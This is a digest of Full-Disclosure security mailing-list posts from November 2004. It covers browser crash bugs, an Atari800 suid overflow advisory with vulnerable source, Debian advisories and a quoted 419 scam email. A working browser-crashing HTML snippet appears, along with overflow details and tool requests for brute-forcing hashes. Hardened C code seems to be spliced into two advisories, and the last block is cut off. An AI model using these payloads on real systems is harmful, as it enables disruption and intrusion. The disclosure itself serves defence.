Re: [Full-Disclosure] irc legality

2004-11-25 Thread Marius Huse Jacobsen
Hello Simon,

Saturday, November 20, 2004, 2:22:12 AM, you wrote:

SL In the following scenario: you are a business; can IRC logs of
SL conversations and lists of hosts be held up in a court of law if a
SL client you spoke to refused to pay or hold up their end of a bargain
SL or agreement, and is faxing a document (no hard copies sent via
SL post) accepted as a legal document in a court of law?

I Am Not A Lawyer...  so don't trust me on questions of legality.

but, from a logical standpoint:

I think an independent third party present would greatly help in the
IRC case.

Create a channel, make sure no one else can get in (though remember
admins might still see what you're saying), invite the other party, and
invite a recorderbot of some sort.

The recorderbot would join, transmit a message to the channel saying
I'm recording everything said here or something to the effect. After
which the business part would start.

I'm imagining something like a command !bind : Will all parties
accept being bound to this agreement? and a command !finish after
all have said yes. The finish command would cryptographically sign the
log, send it to each participant, as well as store it somewhere.

That should, provided the integrity of the recorderbot (and its
hosts) (i.e. has not been hacked, trustworthy (independent?) admin)
prove that a conversation, and its contents, has in fact taken place.

Weaknesses:
1. It does not prove that the two parties both are who they would
appear to be. The deal would not be valid if made with someone else.
2. The independence and integrity of the recorderbot could be
questioned.
3. Things I haven't thought of. (Anyone?)

-- 
Best regards,
 Marius  mailto:[EMAIL PROTECTED]
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Windows user privileges

2004-11-25 Thread devis
So it looks like MS itself will settle that one:
[quote]
---
[snip]
Amongst the many things this malware does, all of which require admin 
rights, are:

   * Creating files in the system32 directory.
   * Terminating various processes.
   * Disabling the Windows Firewall.
   * Downloading and writing files to the system32 directory.
   * Deleting registry values in HKLM.
All these fail if the user running the e-mail client is not an 
administrator.

So wouldn't it be useful (read: safer) if you could browse the Web, read 
e-mail, and so on as a non-admin, even though you need to perform your 
normal daily tasks as an admin?
__

[end quote]
by Michael Howard (Senior Security Program Manager in the Secure 
Engineering group at Microsoft).

The DropMyRights Application.
http://msdn.microsoft.com/security/securecode/columns/default.aspx?pull=/library/en-us/dncode/html/secure11152004.asp
This should be pushed as an update and the steps of shortcut described 
in the link automatised.

BTW, after a cracked Sound application for creating .wav, in that one 
we've got:
Location: C:\warez\dropmyrights.exe c:\program files\internet explorer\iexplore.exe

C:\warez . no comments.


[Full-Disclosure] MSIE flaws: nested array sort() loop Stack overflow exception

2004-11-25 Thread Berend-Jan Wever
Hi all,

Another flaw in IE:

<HTML>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>

Normally I would see if it's exploitable but I figure I'm not MS's pet bug 
finder/analyser... So, I've CC'ed this message to Microsoft. I'm sure they know 
their own product better than I do and can analyse the problem much faster. So 
if you want to know the impact of this vulnerability, ask them: I'm sure they 
will be more than willing to help you. I'm sure they will even reply to this 
message with technical details and a patch tomorrow.

Added to the list: http://www.edup.tudelft.nl/~bjwever/advisory_ie_flaws.html

Cheers,
SkyLined
http://www.edup.tudelft.nl/~bjwever

PS. Don't think firefox will keep you safe from hackers, I _know_ it won't ;) 
But more on that later...
PS2. Recursive function call will cause stack overflow causing write exception 
in guard page on a push, no control over registers.




RE: [Full-Disclosure] MS Windows Screensaver Privilege Escalation

2004-11-25 Thread Stuart Fox (DSL AK)

 
 On Windows XP all releases, when you replace, or change the 
 screensaver displayed on the login screen with a specially 
 crafted version designed to execute programs, those programs 
 are launched under the SYSTEM SID, i.e. they are given 
 automatically the highest access level available to Windows.  
 This level is not accessible even to administrators.
 
 This flaw is important because while one would need Power 
 User privileges or above to change the Login Screensaver, by 
 default, any user with the exception of guest can replace the 
 login screensaver file with a modified version.  In theory, 
 any determined user could execute ANYTHING with SYSTEM 
 privileges.  A similar flaw exists in Win2K, but Microsoft 
 has ignored it.
 

Interesting when read in the context of this:

http://support.microsoft.com/default.aspx?scid=kb;en-us;221991&sd=tech 



[Full-Disclosure] John the Ripper MS-SQL patch

2004-11-25 Thread Calum Power
G'day list,

I was just wondering if anyone had heard of/written a patch for John the
Ripper which makes it possible to brute-force MS-SQL password hashes.

Cheers,
Calum

--
Calum Power
- Cultural Jammer
- Security Enthusiast
- Hopeless Cynic
[EMAIL PROTECTED]
http://www.fribble.net



[Full-Disclosure] (no subject)

2004-11-25 Thread Adam Zabrocki
Name:   Atari800
Vendor URL: http://atari800.sourceforge.net/ 
Author: Adam Zabrocki [EMAIL PROTECTED] 
Date:   November 20, 2004
 

Issue: 


  Atari800, a free and portable Atari800/XL/XE/5200 emulator, allows an attacker to
execute shellcode with suid root privileges where Atari800 is installed.


Description: 


  Atari800 is a free and portable Atari800/XL/XE/5200 emulator, originally written
by David Firth and now developed by the Atari800 Development Team. This program is
copyrighted and released under the GPL.


Details: 

 
It is possible to execute shellcode via the function Aprint(), which is called badly
in the function Atari800_Initialise().

  Local users able to run atari800 (in the default installation atari800 is suid
root) are able to execute shellcode with root privileges.
  The problem lies in the Atari800_Initialise() function, which makes a bad call to
the function Aprint().
 
src/atari.c
int Atari800_Initialise(int *argc, char *argv[])
{
    int error = FALSE;
    ...
    ...

    ...
    ...
    /*
     * Any parameters left on the command line must be disk images.
     */

    for (i = 1; i < *argc; i++) {
        if (!SIO_Mount(diskno++, argv[i], FALSE)) {
 ![1]!      Aprint("Disk File %s not found", argv[i]);
            error = TRUE;
        }
    }

    if (error) {
 ![2]!  Aprint("Usage: %s [options] [diskfile1...diskfile8]", argv[0]);
        Aprint("\t-help Extended Help");
        Atari800_Exit(FALSE);
        return FALSE;
    }
    ...
    ...
}

The Aprint() function is written by the program's authors.

src/log.c
void Aprint(char *format, ... )
{
    va_list args;
    char buffer[256];
#ifdef BUFFERED_LOG
    int buflen;
#endif

    va_start(args, format);
    vsprintf(buffer, format, args);
    va_end(args);

#ifdef BUFFERED_LOG
    strcat(buffer, "\n");
    buflen = strlen(buffer);

    if ((strlen(memory_log) + strlen(buffer) + 1) > MAX_LOG_SIZE)
        *memory_log = 0;

    strcat(memory_log, buffer);
#else
    printf("%s\n", buffer);
#endif
}

  We can control the argument argv[0] which is given to the function Aprint(),
which calls vsprintf() and in the end can overflow. When we create a symlink to the
real path of atari800, argv[0] will be changed. Exploiting this bug can give root
privileges.
This bug exists in older Atari800 (I read the source of version 1.3.0); in the
latest version there isn't an overflow in the Aprint() function. It was rewritten!
Atari800 has other bugs that exist when the program reads the config file.
The bugs exist in the function RtConfigLoad()

src/rt-config.c
int RtConfigLoad(const char *alternate_config_filename)
{
    FILE *fp;
    const char *fname = rtconfig_filename;
    int status = TRUE;
    char string[256];
    char *ptr;

    ...
    ...
    while (fgets(string, sizeof(string), fp)) {
        RemoveLF(string);
        ptr = strchr(string, '=');
        if (ptr) {
            *ptr++ = '\0';

            if (strcmp(string, "OS/A_ROM") == 0)
 ![3]!          strcpy(atari_osa_filename, ptr);
            else if (strcmp(string, "OS/B_ROM") == 0)
 ![4]!          strcpy(atari_osb_filename, ptr);
            else if (strcmp(string, "XL/XE_ROM") == 0)
 ![5]!          strcpy(atari_xlxe_filename, ptr);
            else if (strcmp(string, "BASIC_ROM") == 0)
 ![6]!          strcpy(atari_basic_filename, ptr);
            else if (strcmp(string, "5200_ROM") == 0)
 ![7]!          strcpy(atari_5200_filename, ptr);
            else if (strcmp(string, "DISK_DIR") == 0) {
                if (disk_directories == MAX_DIRECTORIES)
                    printf("All disk directory slots used!\n");
                else
 ![8]!              strcpy(atari_disk_dirs[disk_directories++], ptr);
            }
            else if (strcmp(string, "ROM_DIR") == 0)
 ![9]!          strcpy(atari_rom_dir, ptr);
            else if (strcmp(string, "H1_DIR") == 0)
 ![10]!         strcpy(atari_h1_dir, ptr);
            else if (strcmp(string, "H2_DIR") == 0)
 ![11]!         strcpy(atari_h2_dir, ptr);
            else if (strcmp(string, "H3_DIR") == 0)
 ![12]!         strcpy(atari_h3_dir, ptr);
            else if (strcmp(string, "H4_DIR") == 0)
 ![13]!         strcpy(atari_h4_dir, ptr);
            ...
            else if (strcmp(string, "EXE_DIR") == 0)
 ![14]!         strcpy(atari_exe_dir, ptr);
 
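Hardened replacements for the two patterns the advisory marks, as an added example that is neither the Atari800 project's code nor the fix it later shipped: Aprint() rebuilt on vsnprintf() so an overlong argv[0] is truncated instead of written past the 256-byte buffer, and the RtConfigLoad() strcpy() calls replaced by a bounded copy that rejects values that do not fit. FILENAME_LEN and the two-field struct are assumptions (the advisory does not show the real array sizes); the constructed inputs are a 600-byte argv[0] and a 200-byte DISK_DIR value.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Sizes follow the advisory: Aprint() formats into a 256-byte buffer and
 * RtConfigLoad() reads 256-byte lines. FILENAME_LEN is an assumption; the
 * advisory does not show how large the atari_*_filename arrays are. */
#define LOG_BUF_SIZE 256
#define FILENAME_LEN 128

/* Bounded replacement for Aprint(): vsnprintf() stops at outsz - 1 characters,
 * however long argv[0] (or any other argument) is. Returns 1 if the message was
 * truncated, 0 if it fit, -1 on a formatting error. */
int aprint_bounded(char *out, size_t outsz, const char *format, ...)
{
    va_list args;
    int needed;

    va_start(args, format);
    needed = vsnprintf(out, outsz, format, args);
    va_end(args);
    if (needed < 0) {
        out[0] = '\0';
        return -1;
    }
    return (size_t)needed >= outsz;
}

/* Bounded replacement for the strcpy() calls marked ![3] to ![14]: a value
 * that does not fit is rejected instead of being written past the array.
 * Returns 0 on success, -1 if the value was rejected. */
int config_copy(char *dst, size_t dstsz, const char *value)
{
    size_t n = strlen(value);

    if (n >= dstsz) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, value, n + 1);
    return 0;
}

/* Two of the RtConfigLoad() destinations, enough to show the pattern (assumed layout). */
struct config {
    char osa_filename[FILENAME_LEN];
    char disk_dir[FILENAME_LEN];
};

/* Apply one "KEY=VALUE" line the way RtConfigLoad() does, but via config_copy().
 * Returns 0 when applied, -1 for an unknown key or a line without '=',
 * -2 when the line or the value is too long. */
int config_apply_line(struct config *cfg, const char *line)
{
    char string[256];
    char *ptr;

    if (strlen(line) >= sizeof string)
        return -2;
    strcpy(string, line);           /* safe: length checked just above */
    ptr = strchr(string, '=');
    if (!ptr)
        return -1;
    *ptr++ = '\0';
    if (strcmp(string, "OS/A_ROM") == 0)
        return config_copy(cfg->osa_filename, sizeof cfg->osa_filename, ptr) ? -2 : 0;
    if (strcmp(string, "DISK_DIR") == 0)
        return config_copy(cfg->disk_dir, sizeof cfg->disk_dir, ptr) ? -2 : 0;
    return -1;
}

/* Constructed input: a 600-byte argv[0], as a long symlink name would give.
 * Returns 1 if the usage message was cut at LOG_BUF_SIZE - 1 characters. */
int demo_long_argv0(void)
{
    char argv0[601], buffer[LOG_BUF_SIZE];
    int truncated;

    memset(argv0, 'A', 600);
    argv0[600] = '\0';
    truncated = aprint_bounded(buffer, sizeof buffer,
                               "Usage: %s [options] [diskfile1...diskfile8]", argv0);
    return truncated == 1 && strlen(buffer) == LOG_BUF_SIZE - 1;
}

/* Constructed input: a normal OS/A_ROM line, then a 200-byte DISK_DIR value.
 * Returns 1 if the first was applied and the second rejected with disk_dir left empty. */
int demo_config_lines(void)
{
    struct config cfg;
    char line[256];

    memset(&cfg, 0, sizeof cfg);
    if (config_apply_line(&cfg, "OS/A_ROM=atariosa.rom") != 0 ||
        strcmp(cfg.osa_filename, "atariosa.rom") != 0)
        return 0;
    strcpy(line, "DISK_DIR=");
    memset(line + 9, 'B', 200);
    line[209] = '\0';
    return config_apply_line(&cfg, line) == -2 && cfg.disk_dir[0] == '\0';
}
```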

Re: [Full-Disclosure] John the Ripper MS-SQL patch

2004-11-25 Thread Luke Norman
Calum Power wrote:
G'day list,
I was just wondering if anyone had heard of/written a patch for John the
Ripper which makes it possible to brute-force MS-SQL password hashes.
Cheers,
Calum
--
Calum Power
- Cultural Jammer
- Security Enthusiast
- Hopeless Cynic
[EMAIL PROTECTED]
http://www.fribble.net

 

Hi list,
  On the same theme, I've been looking for a patch for John which 
allows it to brute-force MD5-APR. Anyone know of anything like this?

Thanks in advance
Luke


Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-25 Thread DanB UK
Hi,
 Agreed. But if the idea is to protect your internal clients from your
 intranet web servers, the proxy isn't doing much for you. Plus again,
 someone can just configure their machine to not use the proxy as mentioned
 previously. If the machines are available on the public intranet without
 having to go through some firewall, you can't slap much of a guarantee on
 things not reaching them except via your proxy. You mention setting up
 routing ACL policies for HTTP traffic further down. This isn't something
 that is reasonable to manage in a large organization and does nothing from
 stopping people from selecting alternate ports.

Well, if you stick a firewall in between and limit to only 80/443 and
then redirect the requests to a web proxy (I know there are issues with
https proxying, like MTM), then you can filter/drop/do whatever you
like.

Cheers,
Dan.

-- 
DanB UK
London, UK



RE: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception

2004-11-25 Thread Randal, Phil
An email to [EMAIL PROTECTED] would have sufficed.

That email address can be found at
http://www.mozilla.org/security/bug-bounty.html

Phil


Phil Randal
Network Engineer
Herefordshire Council
Hereford, UK  

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Berend-Jan Wever
 Sent: 25 November 2004 01:05
 To: [EMAIL PROTECTED]; 
 [EMAIL PROTECTED]; [EMAIL PROTECTED]
 Subject: [Full-Disclosure] FIREFOX flaws: nested array sort() 
 loop Stack overflow exception
 
 Hi all,
 
 Same flaw works for Firefox as well as MSIE:
 
 <HTML>
   <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
   <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
 </HTML>
 
 Added to the list: 
 http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html
 
 I'd have loved to CC mozilla about this, but I didn't have 
 the time to do the crash course how to write a bug report 
 and go through all that bugzilla crap.
 
 Cheers,
 SkyLined
 http://www.edup.tudelft.nl/~bjwever
 
 
 
 
 



Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-25 Thread Gregh

- Original Message - 
From: Phillip R. Paradis [EMAIL PROTECTED]
To: 'devis' [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Thursday, November 25, 2004 6:51 PM
Subject: RE: [Full-Disclosure] IE is just as safe as FireFox


 Nice ...fresh from the oven too. This, if it works, should be an 
 'extremely critical' update from Ms.
 
 Wouldn't such a tool be of limited utility, given that the unprivileged
 application's windows are on the same desktop as, and can therefore send
 messages to, windows belonging to privileged applications?
 


I'm sorry but seeing other people insist that it is OK to send American election 
stuff to the list, I thought it would be OK to translate your text into 
something that made sense, so here goes:

Wouldn't such a tool be of limited utility, given that the unprivileged 
application's windows are on the same desktop as, and can therefore send 
messages to, the windows that belong to privileged applications?

Naaa...sorry, I don't speak Italian so it didn't make sense to me that way, 
either.

Gregh.



[Full-Disclosure] Re: Sun Java Plugin arbitrary package access vulnerability

2004-11-25 Thread Alla Bezroutchko
Jouko Pynnonen wrote:
A vulnerability in Java Plugin allows an attacker to create an Applet 
which can disable Java's security restrictions and break out of the 
Java sandbox.
skip
The Java Plugin versions 1.4.2_04 and 1.4.2_05 were tested on Windows 
and Linux. Web browsers tested were Microsoft Internet Explorer, 
Mozilla Firefox and Opera. It should be noted that Opera uses a 
different way of connecting JavaScript and Java which caused the test 
exploit not to work on Opera. However the problem itself (access to 
private packages) was demonstrated on Opera too, so it may be 
vulnerable to a variation of the exploit.
As noted by rodmoses(at)yahoo(dot)com Opera remains vulnerable even 
after the upgrade of JVM to version 1.4.2_06. (tested on Windows XP SP2, 
Opera 7.54, J2SE 1.4.2_06).

According to Jouko, Opera does not use Java plugin, but has its own 
interface to Java. The fact that the problem is still present after JVM 
upgrade probably means that there is an independent bug in Opera Java 
interface which has the same effect as the bug in Sun Java Plugin.

AFAIK there is no fix for Opera yet. I have reported this bug to Opera 
through their web interface (bug-158156).

There is an online test for this bug at Browser Security Test 
(http://bcheck.scanit.be/bcheck/). Go to 
http://bcheck.scanit.be/bcheck/choosetests.php if you only want to run 
the test for this particular bug.

Alla.


[Full-Disclosure] [SECURITY] [DSA 599-1] New tetex-bin packages fix arbitrary code execution

2004-11-25 Thread debian-security-announce
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 599-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
November 25th, 2004 http://www.debian.org/security/faq
- --

Package: tetex-bin
Vulnerability  : integer overflows
Problem-Type   : remote
Debian-specific: no
CVE ID : CAN-2004-0888
Debian Bug : 278298

Chris Evans discovered several integer overflows in xpdf, that are
also present in tetex-bin, binary files for the teTeX distribution,
which can be exploited remotely by a specially crafted PDF document
and lead to the execution of arbitrary code.

For the stable distribution (woody) these problems have been fixed in
version 20011202-7.3.

For the unstable distribution (sid) these problems have been fixed in
version 2.0.2-23.

We recommend that you upgrade your tetex-bin packages.


Upgrade Instructions
- 

wget <url>
will fetch the file for you
dpkg -i <file.deb>
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- 


[Full-Disclosure] Fwd: Hi, It's Me !!!!!

2004-11-25 Thread john morris
-- Forwarded message --
From: [EMAIL PROTECTED] [EMAIL PROTECTED]
Date: Wed, 24 Nov 2004 21:08:16 -0800
Subject: Hi, It's Me !
To: 


FROM THE DESK OF BARRISTER. Wisdom Joshua (ESQ).

Dear,

I am Wisdom Joshua Esq., a Senior Advocate of
Nigeria . I am the legal Representative to Mr. Harold
Lebron, a national of your country, who used to work
with Shell Development Company in Nigeria. Here in
after shall be referred to as my client.

On the 21st of April 2001, my client, his wife and
their only daughter were involved in a fire outbreak
in their residence. All of the family members
unfortunately lost their lives. Since then I have made
several enquiries to your embassy here to locate any
of my client's extended relatives; this has also proved
unsuccessful. After these several unsuccessful
attempts, I decided to track his closest relations
over the Internet, hence I contacted you.

I have contacted you to assist in returning the fund
valued at 16,000,000.00 USD left behind by
my client before it gets confiscated or declared
unserviceable by the Vault Company or Managers where
this huge amount was lodged. The said Finance Company
has issued me a notice to provide the relatives or
families of the deceased or have the account
confiscated within the next fourteen official working
days. For the fact that I have been unsuccessful in
locating the relatives for over 2 years now, I seek
the consent to present you as the family member to the
deceased, so that the proceeds of this account can be
paid to you.

Secondly he has a consignment tagged 'family
valuables' he shipped or lifted as cargo to Europe
early the same year he died; according to the
information he passed to me, it is of importance to
him.

Therefore, if you are interested, endeavor to reach me
immediately on my other email as thus:
[EMAIL PROTECTED] to enable me to inform you of the
modalities on how to carry out this project. I have
all necessary information and legal documents needed
to back you up for the claim. All I require from you is
your honest cooperation to enable us to see this
transaction through. I guarantee that this will be
executed under a legitimate arrangement that will
protect you from any breach of the law.

Please get in touch with me as soon as possible to
enable us to conclude this matter.

Best regards,

Barrister Wisdom Joshua Esq.





-- 
(FROM LINKS TO LINKS WE ARE ALL LINKED)

cheers.

morris



[Full-Disclosure] [SECURITY] [DSA 598-1] New yardradius packages fix arbitrary code execution

2004-11-25 Thread debian-security-announce
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 598-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
November 25th, 2004 http://www.debian.org/security/faq
- --

Package: yardradius
Vulnerability  : buffer overflow
Problem-Type   : remote
Debian-specific: no
CVE ID : CAN-2004-0987
Debian Bug : 278384

Max Vozeler noticed that yardradius, the YARD radius authentication
and accounting server, contained a stack overflow similar to the one
from radiusd which is referenced as CAN-2001-0534.  This could lead to
the execution of arbitrary code as root.

For the stable distribution (woody) this problem has been fixed in
version 1.0.20-2woody1.

For the unstable distribution (sid) this problem has been fixed in
version 1.0.20-15.

We recommend that you upgrade your yardradius package immediately.


Upgrade Instructions
- 

wget <url>
will fetch the file for you
dpkg -i <file.deb>
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- 



  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>



RE: [Full-Disclosure] John the Ripper MS-SQL patch

2004-11-25 Thread Todd Towles
I haven't seen a patch that makes John capable of this, but I guess it
wouldn't be impossible.

You can look at ForceSQL v2.0 and Hydra. Hydra is put out by THC and
should be able to do what you want John to do for you.

-Todd

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Calum Power
 Sent: Thursday, November 25, 2004 2:32 AM
 To: [EMAIL PROTECTED]
 Subject: [Full-Disclosure] John the Ripper MS-SQL patch
 
 G'day list,
 
 I was just wondering if anyone had heard of/written a patch 
 for John the Ripper which makes it possible to brute-force 
 MS-SQL password hashes.
 
 Cheers,
 Calum
 
 --
 Calum Power
 - Cultural Jammer
 - Security Enthusiast
 - Hopeless Cynic
 [EMAIL PROTECTED]
 http://www.fribble.net
 
 



Re: [Full-Disclosure] Why is IRC still around?

2004-11-25 Thread n3td3v
On Wed, 24 Nov 2004 21:17:24 -0600, vord [EMAIL PROTECTED] wrote:
 this is quite possibly the most ridiculous thing ive ever read.
 normally i would respond to it in more detail but i have received
 literally dozens of responses from members of this list who either
 sympathize with my position or have outright called you an
 idiot/lamer. i therefore see no need to defend myself or #hackphreak
 publicly when the public does not require it. they already know you're
 a moron, i dont need to beat a dead horse by making you look the fool
 over and over again.

I'm sure all your script kiddie friends are backing you up, I don't
doubt it for a second. That doesn't mean you're right, it just means you
have a lot of script kiddie friends with the same views as yourself. It
sounds like you've got the script kiddie support of the FD list. What
an achievement, you must be so proud of yourself, so proud you had to
post it on FD how many private e-mails you get off-list agreeing with
you.

If I'm an idiot lamer, I'd hate to hear what they're calling you.

Thanks,
n3td3v



[Full-Disclosure] More Browser flaws on MACOSX: nested array sort() loop Stack overflow exception

2004-11-25 Thread Marco Mella
Same problems on MACOSX 10.3.6 with:
- Safari 1.2.4
- Mozilla 1.7
- Camino 0.7.0
- Firefox 1.0
- Opera 6.0.3
Not affected: IE 5.2.3

Regards
--
Marco

 Hi all,

 Same flaw works for Firefox as well as MSIE:

 Added to the list: http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html

 I'd have loved to CC mozilla about this, but I didn't have the time to do the
 crash course "how to write a bug report" and go through all that bugzilla crap.

 Cheers,
 SkyLined
 http://www.edup.tudelft.nl/~bjwever

Re: [Full-Disclosure] Shellcode encoder used in IFRAME exploit.

2004-11-25 Thread Max Valdez
On Wednesday 24 November 2004 2:44 pm, Berend-Jan Wever wrote:
 Hi all,

 I have been getting a lot of questions about the encoded shellcode I used
 in InternetExploiter. That's why I've decided to release the source to my
 encoder, so you can all use it in your personal version of my exploit.
 (Remember that the origional code was released under GPL! I'm still hoping
 I get to see the guy who wrote those MyDoom worms in court, he violated the
 GPL and spread millions(?) of copies of my (modified) source).
I'm pretty sure the author didn't do that, and even if (s)he did, it's not 
necessarily illegal; you may not have read the license :-)

Max
-- 
Linux garaged 2.6.9-ac9 #2 SMP Tue Nov 16 17:07:13 CST 2004 i686 Intel(R) 
Pentium(R) 4 CPU 2.80GHz GenuineIntel GNU/Linux
gpg-key: http://garaged.homeip.net/gpg-key.txt

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] MSIE flaws: nested array sort() loop Stack overflow exception

2004-11-25 Thread Adi Pircalabu
On Thu, 25 Nov 2004 01:41:20 +0100
Berend-Jan Wever [EMAIL PROTECTED] wrote:

 <HTML>
   <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
   <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
 </HTML>

Also Opera 7.54 should be added, it crashes on the above code, at least
the native FreeBSD version

-- 
Adrian Pircalabu

Public KeyID = 0xF902393A



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] The Tel Aviv University Security Forum - meeting #6 - 19/12/04

2004-11-25 Thread Gadi Evron
Hello!
The next, non-commercial, technological Security Forum will take place
on Sunday, the 19th of December, 2004, at Tel Aviv University's Lev
Auditorium.
112 people came to our last meeting on the 17th of October. The air
conditioner worked well, but it wasn't cold enough (at least for me
personally).
Schedule

17:45 - Gathering - hot and cold drinks will be served.
18:00 - Golan Brener, Director - B.GRG LTD.
  Lecture: Wireless hacking & technology.
  Level: Technological. There will be a discussion of protocols and
 techniques.
  Golan will discuss different wireless protocols, their weaknesses,
  implementations and ways of protecting and breaking them.
  There will be wireless hacking demonstrations, but the bulk of the
  lecture will be about the technology itself - and not necessarily just
  the protocols and/or vulnerabilities we are all familiar with.
19:20 - We will break for a short recess, as well as for
  refreshments and networking between members - hot and cold
  drinks will be served.
19:40 - Ofir Liber, adv. Information Security Dept. Manager, Internet
  Zahav.
  Lecture: The Trojan horse defense.
  Level: This lecture will be suited for all levels.
  In his lecture, Ofir will discuss the legal defense known as the
  Trojan horse defense. I.e., "I didn't do it! It was the evil hacker
  who broke into my PC!".
  Ofir will provide a general overview, legal issues, defending and
  prosecuting with that pretense, is it even viable? etc.
Hot and cold drinks will be freely available.
Attendance is free.
For a map of the university please visit:
http://www2.tau.ac.il/map/unimapl1.asp
For future and past lectures, presentations and general information:
http://www.cs.tau.ac.il/tausec
You can also visit our Orkut community (Tausec):
http://www.orkut.com/Community.aspx?cmm=422590
Thank you all, and please pass this information to others.
Who we are
--
The Security Forum, hosted by the Tel Aviv University, started when a
few of us talked about there being an (almost) complete lack of
professional and social events on security in Israel which are not
completely commercial and about sticking products down our throats.
We decided to do instead of complain, and here we are.
In previous meetings we had over a hundred arrivals, varying from
soldiers and students, through programmers and government CSO's, all the
way to CEO's and CTO's of different companies, banks and other
institutions. Some have been part of our community since the 70's and
some are just people who are interested in the subject.
Have a good week,
Gadi Evron.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Limited buffer-overflow and arbitrary memory access in Star Wars Battlefront 1.11

2004-11-25 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  Star Wars Battlefront
  http://www.lucasarts.com/games/swbattlefront/
Versions:     <= 1.11
Platforms:Windows
  Xbox and Playstation 2 have not been tested
Bugs: A] limited buffer-overflow in nickname
  B] crash caused by arbitrary memory access
Exploitation: remote, versus server (in-game)
Date: 24 November 2004
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:http://aluigi.altervista.org


###


1) Introduction
2) Bugs
3) The Code
4) Fix


###

===
1) Introduction
===


Star Wars Battlefront is the newest game based on the Star Wars
universe; it is developed by Pandemic Studios (http://www.pandemicstudios.com)
and was released in September 2004.

This game is also available for Xbox and Playstation 2. The dedicated
server for Playstation 2 runs on Windows and uses the same join
protocol as the PC version; in fact I have tested it and it is vulnerable.
Since I'm not able to directly test these 2 platforms themselves, I
cannot confirm whether they are vulnerable or not.


###

===
2) Bugs
===

--
A] limited buffer-overflow in nickname
--

If a client uses a nickname that is too big, it causes a limited
buffer-overflow in the server. Limited because it doesn't seem possible
to overwrite important memory zones and, so, to execute remote code.


--
B] crash caused by arbitrary memory access
--

There is a strange field in the join request used by this game.
This field is a 32 bit value that must contain a memory offset used to
build the following debug message:

 player %s had crash at 0x%x\n

where %s is just the memory address specified by the client.
The effect, naturally, is that an attacker can force the server to
read an unreachable memory location, causing its immediate crash.
I have no idea why such a stupid and dangerous method has been used.
Note: this bug doesn't seem to affect the Playstation 2 dedicated
server.


Both these bugs must be considered in-game bugs (translated: if the
server is protected with a password, the attacker must know it), simply
because the password field (a 32 bit checksum) is checked before the
other information, so the packet is rejected if the password provided
by the attacker is wrong.
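An added example, not code from the advisory or from the game: a hardened handler for a join request of the shape described above, which bounds the nickname (bug A) and never treats the client's 32-bit field as a pointer (bug B). The wire layout, NICK_MAX and the function names are assumptions; the sample value 1234 (0x04d2) mirrors the advisory's own example.

```c
/* Added example (not from the advisory or from Pandemic): a hardened parser
 * for a join request shaped like the one described above. Wire layout,
 * NICK_MAX and the function names are assumptions for illustration. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NICK_MAX 31                  /* assumed server-side nickname limit */

struct join_request {
    char     nick[NICK_MAX + 1];
    uint32_t crash_addr;             /* the advisory's 32-bit "memory offset" field */
};

/* Assumed layout: [nickname, NUL-terminated][4-byte little-endian value].
 * Returns 0 on success; negative codes identify the rejection reason.
 * Bug A is avoided by refusing any nickname longer than NICK_MAX before
 * a single byte is copied, instead of copying up to the NUL wherever it is. */
int parse_join_request(const unsigned char *pkt, size_t len,
                       struct join_request *out)
{
    const unsigned char *nul = memchr(pkt, '\0', len);
    if (nul == NULL)
        return -1;                   /* no terminator inside the packet */
    size_t nlen = (size_t)(nul - pkt);
    if (nlen == 0 || nlen > NICK_MAX)
        return -2;                   /* bug A: oversized nickname, rejected */
    if (len - nlen - 1 < 4)
        return -3;                   /* truncated: 32-bit field missing */

    memcpy(out->nick, pkt, nlen);
    out->nick[nlen] = '\0';
    const unsigned char *p = nul + 1;
    out->crash_addr = (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
                      ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
    return 0;
}

/* Bug B is the server formatting the client's 32-bit value with %s, i.e.
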